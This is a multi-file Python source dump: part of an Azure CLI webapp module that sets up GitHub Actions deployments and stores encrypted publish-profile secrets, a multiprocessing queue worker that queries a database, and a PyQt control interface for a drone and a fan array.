return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or site_availability.reason == 'Invalid':
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if app_runtime_info and app_runtime_info['display_name']:
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning("The app runtime '%s' does not match the runtime specified: '%s'. "
"Using the specified runtime '%s'.", app_runtime_string, runtime, runtime)
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or site_availability.reason == 'Invalid':
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
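# Example (hypothetical secret name, editorial addition): given a workflow line such as
#   publish-profile: ${{ secrets.AzureAppService_PublishProfile_abc123 }}
# the helper above returns 'AzureAppService_PublishProfile_abc123'.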
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 3:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
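# Editorial note: this follows GitHub's documented flow for creating Actions secrets. The repository public
# key fetched in _add_publish_profile_to_github seals the secret with PyNaCl's SealedBox, and the base64
# ciphertext is sent together with the key_id in the PUT payload above.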
|
client.py
|
#coding=utf8
import time, sys, Queue
import MySQLdb
from MySQLdb import cursors
from multiprocessing.managers import BaseManager
from multiprocessing.sharedctypes import RawArray
from multiprocessing import Process, freeze_support, Array
reload(sys)
sys.setdefaultencoding('utf8')
def work(server_addr):
# Database connection
from database.db import baidu_db
# Network connection
class QueueManager(BaseManager):
pass
QueueManager.register('get_task_queue')
QueueManager.register('get_result_queue')
print('Connect to server %s...' % server_addr)
m = QueueManager(address=(server_addr, 5000), authkey='abc')
m.connect()
task = m.get_task_queue()
result = m.get_result_queue()
while True:
try:
(nn, ii, jj, name) = task.get(timeout=100)
candidates = baidu_db.getCandidates(name)
result.put((nn, ii, jj, candidates))
except Queue.Empty:
print 'queue is empty'
continue
print 'worker exit.'
if __name__ == '__main__':
freeze_support()
if len(sys.argv) > 1:
num = int(sys.argv[1])
else:
num = 3
print 'total process number is %d'%num
processes = []
for i in xrange(num):
processes.append(Process(target=work, args = ('192.168.1.104',)))
for p in processes:
p.start()
for p in processes:
p.join()
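# Illustrative sketch (editorial addition, not part of the original client): the worker above expects a
# manager process that exposes 'get_task_queue' and 'get_result_queue' on port 5000 with authkey 'abc'.
# A minimal matching server could look like this; the host binding and queue contents are assumptions.
# Queue and BaseManager are already imported at the top of this module.
def example_task_server():
    task_queue = Queue.Queue()
    result_queue = Queue.Queue()
    class ServerQueueManager(BaseManager):
        pass
    # Register the same names the client looks up, backed by real queues on the server side
    ServerQueueManager.register('get_task_queue', callable=lambda: task_queue)
    ServerQueueManager.register('get_result_queue', callable=lambda: result_queue)
    manager = ServerQueueManager(address=('', 5000), authkey='abc')
    server = manager.get_server()
    server.serve_forever()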
|
UserInterface.py
|
import os
import math
import time
from threading import Thread, Timer
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
# Main widget
from widgets.ControlPanel import ControlPanel
# Dialog with combo
from dialogs.ComboDialog import ComboDialog
# Replay
from ..log.Replay import Replay
# Drone and fans array control
from ..Commander import Commander
class UserInterface(QMainWindow):
"""Main window of the interface
Provides GUI for windshape drone control.
Inherits from: QMainWindow.
Overrides: __init__, KeyPressEvent
"""
## Refreshing rate
FRAMERATE = 30
def __init__(self):
"""Initializes parent and starts update."""
super(UserInterface, self).__init__()
# Main class
self.commander = Commander()
# Drone control
self.drone = self.commander.getDrone()
self.control = self.drone.getControlParameters()
# Fans array control
self.fansArray = self.commander.getFansArray()
# Check drone state
self.connected = False
self.armed = False
self.tracked = False
self.powered = False
self.faconnected = False
# Setup UI
self.setupUI()
# Timer updating window
self.initTimer()
# Shows window
self.show()
def setupUI(self):
"""Creates Graphical User Interface."""
# Window title and dimensions
self.setWindowTitle('Drone control')
self.setGeometry(0, 0, 1000, 800)
# Main widget (TabWidget)
self.controlPanel = ControlPanel(self)
self.setCentralWidget(self.controlPanel)
# Generates QIcons
self.createIcons()
self.setWindowIcon(self.icon_ws)
# Tool bar (top)
self.toolbar = self.addToolBar('Commands')
self.initToolBar()
self.updateToolbar = True # Updates toolbar actions if True
# Status bar (bottom)
self.statusbar = self.statusBar()
self.statusbar.showMessage('Initialization')
self.updateStatus = True # Locks status bar if set to False
def createIcons(self):
"""Loads QIcons from images in ./icons."""
path = os.path.dirname(os.path.abspath(__file__))+'/icons'
# WindShape icon (window icon)
self.icon_ws = QIcon(path + '/windshape.png')
# Drone icons
self.icon_drone_green = QIcon(path + '/drone_green.png')
self.icon_drone_red = QIcon(path + '/drone_red.png')
# A, D, M icons (for Arming, Disarming, flight Modes)
self.icon_A = QIcon(path + '/A.png')
self.icon_D = QIcon(path + '/D.png')
self.icon_M = QIcon(path + '/M.png')
# Eyes icons (for tracking state)
self.icon_opened_eye = QIcon(path + '/opened_eye.png')
self.icon_closed_eye = QIcon(path + '/closed_eye.png')
# Connection icons (fans array connection)
self.icon_red = QIcon(path + '/red.png')
self.icon_green = QIcon(path + '/green.png')
# Start icon (for replay)
self.icon_start = QIcon(path + '/start.png')
# Top and bottom arrows (for takeoff and land)
self.icon_top_arrow = QIcon(path + '/top_arrow.png')
self.icon_bottom_arrow = QIcon(path + '/bottom_arrow.png')
def initToolBar(self):
"""Loads toolbar actions."""
# Connection
self.connectAction = QAction(self.icon_drone_red, 'Drone disconnected', self)
self.connectAction.triggered.connect(self.onConnect)
self.toolbar.addAction(self.connectAction)
# Fans array PSU
self.toggleAction = QAction(self.icon_red, 'PSU off', self)
self.toggleAction.triggered.connect(self.onTogglePSU)
self.toolbar.addAction(self.toggleAction)
# Tracking
self.trackAction = QAction(self.icon_closed_eye, 'Drone not tracked', self)
self.trackAction.triggered.connect(self.onTrack)
self.toolbar.addAction(self.trackAction)
# Arming
self.armingAction = QAction(self.icon_D, 'Arm', self)
self.armingAction.triggered.connect(self.onArm)
self.toolbar.addAction(self.armingAction)
# Takeoff
self.takeoffAction = QAction(self.icon_top_arrow, 'Takeoff', self)
self.takeoffAction.triggered.connect(self.onTakeoff)
self.toolbar.addAction(self.takeoffAction)
# Land
self.landAction = QAction(self.icon_bottom_arrow, 'Land', self)
self.landAction.triggered.connect(self.onLand)
self.toolbar.addAction(self.landAction)
# Flight mode
self.modeAction = QAction(self.icon_M, 'Flight mode', self)
self.modeAction.triggered.connect(self.onMode)
self.toolbar.addAction(self.modeAction)
# Replay
self.replayAction = QAction(self.icon_start, 'Replay', self)
self.replayAction.triggered.connect(self.onReplay)
self.toolbar.addAction(self.replayAction)
def disableToolBar(self):
"""Disables all toolbar actions."""
self.connectAction.setEnabled(False)
self.trackAction.setEnabled(False)
self.armingAction.setEnabled(False)
self.takeoffAction.setEnabled(False)
self.landAction.setEnabled(False)
def refreshToolBar(self):
"""Asks for toolbar update."""
self.updateToolbar = True
def showMessage(self, message, duration=3):
"""Displays a message for duration beofre overwrite."""
# Locks status bar to block updates and prevents overwriting
self.updateStatus = False
# Display message
self.statusbar.showMessage(str(message))
# If duration is None, wait infinite time before unlocking
if duration is not None:
Timer(duration, self.unlockStatus).start()
def unlockStatus(self):
"""Enable overwriting messages in statusbar."""
self.updateStatus = True
def onConnect(self):
"""Displays drone status."""
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText(str(self.drone))
msg.setWindowTitle('Drone information')
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
def onTrack(self):
"""Displays tracking status."""
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText(str(self.control.getTarget()))
msg.setWindowTitle('Target information')
msg.setStandardButtons(QMessageBox.Ok)
msg.exec_()
def onArm(self):
"""Arms or disarm the drone."""
self.disableToolBar()
cmd = not self.drone.isArmed()
# Show message
if cmd:
self.showMessage('Arming')
else:
self.showMessage('Disarming')
# Arm and refresh toolbar
def arm():
self.drone.arm(cmd)
self.updateToolbar = True
Thread(target=arm).start()
Timer(3, self.updateToolBar).start()
def onTakeoff(self):
"""Auto-takeoff the drone."""
self.disableToolBar()
# Takeoff and refresh toolbar
def takeoff():
self.drone.takeoff()
self.updateToolbar = True
# Takeoff in a separate thread
Thread(target=takeoff).start()
Timer(3, self.updateToolBar).start()
def onLand(self):
"""Auto-land the drone."""
self.disableToolBar()
# Land and refresh toolbar
def land():
self.drone.land()
self.updateToolbar = True
# Land in a separate thread
Thread(target=land).start()
Timer(3, self.updateToolBar).start()
def onMode(self):
"""Changes flight mode with dialog choice."""
mode = self.drone.getFlightMode()
modes = self.drone.FLIGHT_MODES
# Flight mode choice
dialog = ComboDialog(self, 'Flight mode', modes, mode)
# Set new mode in a separate thread if OK pressed
if dialog.exec_():
mode = dialog.getResult()
def set_mode():
self.drone.setFlightMode(mode)
self.updateToolbar = True
Thread(target=set_mode).start()
def onReplay(self):
"""Fetches available record files and plot the chosen one."""
Replay(self)
def onTogglePSU(self):
"""Turns on or off fans array power supply."""
self.fansArray.turnOnPSU(not self.fansArray.isPowered())
def initTimer(self):
"""Starts calling update at FRAMERATE."""
self.timer = QTimer(self)
self.timer.setInterval(int(1000 / UserInterface.FRAMERATE))  # QTimer expects an interval in whole milliseconds
self.timer.timeout.connect(self.update)
self.timer.start()
def update(self):
"""Updates toolbar, statusbar and control panel."""
self.checkStatus()
# Toolbar update if new state or request from a timer
if self.updateToolbar:
self.updateToolBar()
self.updateStatusBar()
self.updateToolbar = False
# Show drone status if no message to display
if self.updateStatus:
self.updateStatusBar()
# Update tabs
self.updateWind()
self.updateInfo()
self.updatePlot()
self.updateSettings()
def checkStatus(self):
"""Asks for refresh if something needs display."""
if self.connected != self.drone.isConnected():
self.connected = self.drone.isConnected()
self.updateToolbar = True
if self.armed != self.drone.isArmed():
self.armed = self.drone.isArmed()
self.updateToolbar = True
if self.tracked != self.drone.isTracked():
self.tracked = self.drone.isTracked()
self.updateToolbar = True
if self.powered != self.fansArray.isPowered():
self.powered = self.fansArray.isPowered()
self.updateToolbar = True
if self.faconnected != self.fansArray.isConnected():
self.faconnected = self.fansArray.isConnected()
self.updateToolbar = True
def updateStatusBar(self):
"""Updates the status bar message."""
if self.drone.isConnected():
message = 'Connected'
else:
message = 'Disconnected'
if self.drone.isArmed():
message += ', Armed'
self.statusbar.showMessage(message)
self.updateStatus = True
def updateToolBar(self):
"""Updates the tool bar icons and activation."""
self.disableToolBar()
# Checks which actions are permitted and updates icons
self.updateConnectAction()
self.updateTrackAction()
self.updateArmingAction()
self.updateTLAction()
self.updateToggleAction()
def updateConnectAction(self):
"""Updates connection icon."""
# Icon and tool tip
if self.drone.isConnected():
self.connectAction.setIcon(self.icon_drone_green)
self.connectAction.setToolTip('Drone connected')
else:
self.connectAction.setIcon(self.icon_drone_red)
self.connectAction.setToolTip('Drone disconnected')
# Always enabled
self.connectAction.setEnabled(True)
def updateToggleAction(self):
"""Change fans array power supply icon."""
if self.fansArray.isConnected():
self.toggleAction.setIcon(self.icon_green)
else:
self.toggleAction.setIcon(self.icon_red)
if self.fansArray.isPowered():
self.toggleAction.setToolTip('PSU on')
else:
self.toggleAction.setToolTip('PSU off')
def updateTrackAction(self):
"""Updates tracking icon."""
# Icon and tool tip
if self.drone.isTracked():
self.trackAction.setIcon(self.icon_opened_eye)
self.trackAction.setToolTip('Drone tracked')
else:
self.trackAction.setIcon(self.icon_closed_eye)
self.trackAction.setToolTip('Drone not tracked')
# Always enabled
self.trackAction.setEnabled(True)
def updateArmingAction(self):
"""Enables/disables arming action and updates icon."""
# Arming icon = A if armed
if self.drone.isArmed():
self.armingAction.setIcon(self.icon_A)
self.armingAction.setToolTip('Disarm')
# Arming icon = D if disarmed
else:
self.armingAction.setIcon(self.icon_D)
self.armingAction.setToolTip('Arm')
# Can arm/disarm only if drone connected
if self.drone.isConnected():
self.armingAction.setEnabled(True)
def updateTLAction(self):
"""Enables/disables takeoff/land action."""
# Can takeoff/land only if armed
if self.drone.isArmed():
self.takeoffAction.setEnabled(True)
self.landAction.setEnabled(True)
def updateWind(self):
"""Updates wind tab (activation of auto wind)."""
activate = self.controlPanel.getAutoWind()
self.commander.setAutoWind(activate)
def updateInfo(self):
"""Updates info tab (get data from drone)."""
# Gets info source from CP
source = self.controlPanel.getSource()
if source == 'Info':
text = str(self.commander)
elif source == 'Pose':
text = self.drone.getMeasurements()
elif source == 'Command':
text = self.control.getMeasurements()
# Sends info to CP
self.controlPanel.displayInfo(text)
def updatePlot(self):
"""Plots drone pose (mocap, FCU, setpoint)."""
mocap = self.drone.getPose()
estimated = self.drone.getEstimate()
setpoint = self.drone.getControlParameters().getSetpoint()
# Send to control panel as list with source label
self.controlPanel.plotData('Mocap', list(mocap))
self.controlPanel.plotData('FCU', list(estimated))
self.controlPanel.plotData('Setpoint', list(setpoint))
def updateSettings(self):
"""Updates drone from settings tab."""
body, target = self.controlPanel.getMocapParameters()
if body != self.drone.getMocapLabel():
self.drone.setRigidBody(body)
self.showMessage('Drone tracker set to '+str(body))
if target != self.control.getTarget().getLabel():
self.control.setTarget(target)
self.showMessage('Drone target set to '+str(target))
offboard, follow, mimic, mask = self.controlPanel.getSettings()
if offboard != self.control.isUsingOffboardControl():
self.control.useOffboardControl(offboard)
self.showMessage('Offboard control set to '+str(offboard))
